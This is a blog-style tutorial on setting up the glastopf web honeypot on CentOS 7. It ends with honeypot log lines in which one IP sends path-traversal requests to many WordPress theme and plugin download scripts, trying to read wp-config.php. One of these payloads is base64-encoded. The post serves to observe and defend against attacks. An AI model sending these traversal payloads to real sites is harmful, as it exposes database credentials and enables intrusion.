Servers keep getting cracked through vulnerabilities in phpMyAdmin or in WordPress plugins.
Want to observe what those intruders do, without putting a real server at risk?
The tool for that is glastopf.
Let's see what kind of requests this honeypot attracts!

glastopf is a honeypot specialised in web applications: it emulates vulnerable PHP-style pages and logs every request it receives.
The installation steps are as follows.

The OS used for this installation was CentOS 7.1.1503.

Installing the prerequisite packages

# Build toolchain plus the headers needed to compile glastopf's Python dependencies
yum groupinstall "Development Tools"
# CentOS 7 names: the C++ compiler package is gcc-c++ (there is no "g++" package) and
# the libevent headers are in libevent-devel (libevent-headers is the EL6 name).
# "mysql" and "mysql-server" resolve to MariaDB on CentOS 7.
yum install zlib-devel bzip2-devel openssl-devel ncurses-devel sqlite-devel readline-devel tk-devel php-devel libxml2-devel libxslt-devel atlas atlas-devel gcc-gfortran gcc-c++ git php php-devel wget mysql mysql-server mysql-devel libevent-devel libffi-devel
# glastopf targets the system Python 2.7; pip is pulled in via setuptools
easy_install pip
yum -y install python-devel

Setting up glastopf

git clone https://github.com/glastopf/glastopf.git
cd glastopf
# Installs the glastopf package and the glastopf-runner command into the system Python
python setup.py install

Create the configuration file.

# Running the runner once in an empty directory writes a default glastopf.cfg there
cd /opt/glastopf/
glastopf-runner

## It errors out at this point, so make the following fixes.
## The runner needs an unprivileged user to drop to once port 80 is bound.
groupadd glastopf
useradd -g glastopf -s /usr/sbin/nologin glastopf
chown -R glastopf:glastopf /opt/glastopf/

vim /opt/glastopf/glastopf.cfg
# cat /opt/glastopf/glastopf.cfg
[webserver]
# Listen on every interface on port 80; the runner binds the port as root and then
# drops privileges to the uid/gid below, which is why the glastopf user was created.
host = 0.0.0.0
port = 80
uid = glastopf
gid = glastopf
proxy_enabled = False

Starting it

glastopf-runner &

Backgrounded with a trailing & like this, the process dies together with the login shell; for anything longer than a quick test, run it under nohup, screen or a systemd unit.

A few days after starting it, I confirmed that suspicious requests were arriving.

2015-06-23 13:35:40,203 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/plugins/gi-media-library/download.php?fileid=Li4vLi4vLi4vd3AtY29uZmlnLnBocA==
2015-06-23 13:35:40,600 (glastopf.glastopf) 206.190.138.84 requested GET ?sd_action=demo&file=wp-config.php
2015-06-23 13:35:40,994 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
2015-06-23 13:35:41,387 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/lote27/download.php?download=../../../wp-config.php
2015-06-23 13:35:41,769 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php
2015-06-23 13:35:42,173 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/RedSteel/download.php?file=../../../wp-config.php
2015-06-23 13:35:42,562 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
2015-06-23 13:35:42,950 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/markant/download.php?file=../../wp-config.php
2015-06-23 13:35:43,219 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/yakimabait/download.php?file=./wp-config.php
2015-06-23 13:35:43,620 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
2015-06-23 13:35:43,997 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/felis/download.php?file=../wp-config.php
2015-06-23 13:35:44,271 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php
2015-06-23 13:35:44,715 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
2015-06-23 13:35:45,147 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/epic/includes/download.php?file=wp-config.php
2015-06-23 13:35:45,553 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
2015-06-23 13:35:45,965 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
2015-06-23 13:35:46,232 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
2015-06-23 13:35:46,487 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
2015-06-23 13:35:46,750 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php

Happy honeypot life!


Reference URL: VPSにハニーポット(Glastopf) を入れてみた ("I tried installing a honeypot (Glastopf) on a VPS")